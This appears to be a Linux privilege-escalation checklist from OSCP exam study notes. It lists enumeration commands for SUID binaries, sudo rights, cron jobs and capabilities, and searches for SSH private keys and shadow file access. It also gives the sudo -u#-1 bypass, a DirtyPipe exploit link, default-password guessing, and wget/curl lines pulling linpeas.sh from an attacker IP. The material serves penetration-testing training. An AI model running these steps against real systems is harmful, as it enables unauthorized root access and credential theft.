> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/linux-privilege-escalation/checklist.md).

# Checklist

```
id
```

```
find / -group <groups> 2>/dev/null
```

```
history
```

```
sudo -l
```

```
sudo -V | grep version
```

```
find / -name id_rsa 2>/dev/null
```

<pre><code><strong>find / -type f -perm -04000 -ls 2>/dev/null
</strong></code></pre>

{% hint style="info" %}
Research any binary with a SUID bit that looks out of place

<https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits>

DirtyPipe can be used to abuse custom SUID binaries

* 5.16.11
* 5.15.25
* 5.10.102
* 5.9.0
  {% endhint %}

```
ls -la /etc/passwd /etc/shadow
```

```
cat /etc/crontab
crontab -l
```

```
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
```

```
cat /etc/exports
```

```
ls -la /var/backups
```

```
sudo -u#-1 /bin/bash
```

<pre><code><strong>ss -anp
</strong>routel
cat /etc/iptables/rules.v4
</code></pre>

```
dpkg -l
```

```
cat .bashrc
```

<pre><code><strong>ps -aux
</strong>ps -aux | grep cron        &#x3C;-- search for "root   /usr/sbin/cron -f"
</code></pre>

{% hint style="info" %}
Snoop on processes using pspy - some cron jobs may be running in the background

Research and enumerate literally every cron job running
{% endhint %}

{% hint style="info" %}
su into other users using their usernames as passwords; vagrant:vagrant
{% endhint %}

Search for credentials in files

Run PEAS and LinEnum

```
wget 192.168.45.x/linpeas.sh 
curl 192.168.45.x/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
```

{% hint style="danger" %}
Search for exploits for sudo version
{% endhint %}
